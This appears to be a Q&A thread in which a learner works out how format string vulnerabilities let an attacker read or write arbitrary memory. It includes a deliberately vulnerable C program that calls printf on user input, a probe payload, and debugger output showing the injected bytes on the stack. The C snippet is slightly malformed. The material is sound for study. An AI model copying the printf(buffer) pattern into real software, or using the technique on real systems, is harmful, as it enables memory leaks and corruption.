3

By playing various wargames I noticed that I kept on getting stuck on format strings vulnerabilities, so I decided to step back and relearn them from scratch. In the process I realized that I couldn't explain to myself why we can read / write to arbitrary locations by providing a valid address.

printf (\x41\x41\x41\x41_%08x_%08x)

According to my understanding of format strings, this function call is supposed to simply print AAAA + stack value + stack value and nothing else. Instead, it leaks two addresses starting by the provided address

From https://crypto.stanford.edu/cs155old/cs155-spring08/papers/formatstring-1.2.pdf

The format function now parses the format string ‘A’, by reading a
character a time. If it is not ‘%’, the character is copied to the output. In
case it is, the character behind the ‘%’ specifies the type of parameter that
should be evaluated. The string “%%” has a special meaning, it is used to print
the escape character ‘%’ itself. Every other parameter relates to data, which
is located on the stack

If the above statement is true, and \x41\x41\x41\x41_%08x_%08x is the only argument of printf() allocated on the stack, then how can we explain reading / writing from/to memory locations ?

EDIT 1:

This answer does indeed specify that we can leak whatever address we want, but it doesn't go over how to start leaking from an arbitrary memory location.

I this other answer

So you're asking how printf can find the string because there is a
different parameter count than the % signs say? Two thought problems here: a)
Before printf can count the % at all, it has to find the string. Wrong string
content can't prevent finding this string. b) Without attacks: printf supports
variable parameter counts, and it always can find the string. Last parameter
etc. doesn't matter.

For some reason the OP assumes that the 'AAAA' part is an actual address.

shxdow
  • 123
  • 2
  • 8

1 Answers1

4

@LiveOverflow helped me figuring out what I couldn't get. Both the assumptions I had were true

  1. printf simply prints what ever isn't a '%' and treats in a special way charcters following '%'
  2. Formatters (%x, %s, '%n, etc...) ONLY use addresses found on the stack (what I mean is that if we start popping off values using %x, those values will be popped of on the stack as long as valid addresses are available

Now in the code in the question, supplying an address as first argument is not enough, we have to somehow put on the stack the address we want to read/write from/to

example:

vuln.c (gcc -g vuln.c -m32 -o vuln):

#include <stdio.h>

int main (int argc, char ** argv) {

    buffer[32];

    fgets (buffer, sizeof(buffer), stdin);

    printf (buffer);

    return 0;
}

We can do by calling the program with an argument ./vuln AAAA. When asked for input we can insert there our format string. Here's the catch: we have to pop values off until we find our AAAA, after %s would dereference the address AAAA and read a string from there aka leaking an arbitrary address. Writing to an address works in the same exact way.

For the sake of simplicity I compiled it with -g so that I could use the *argv symbol

pwndbg> x/4s *argv
0xffffd258: "/home/ncrntn/vu"...
0xffffd267: "ln"
0xffffd26a: "AAAA"
0xffffd26f: "XDG_CONFIG_DIRS"...

At this point we know where to look at

pwndbg> x/200wx $esp
. . .
0xffffd260: 0x6e746e72  0x6c75762f  0x4141006e  0x58004141
. . .

And we indeed found our AAAA (in hex \x41\x41\x41\x41)

shxdow
  • 123
  • 2
  • 8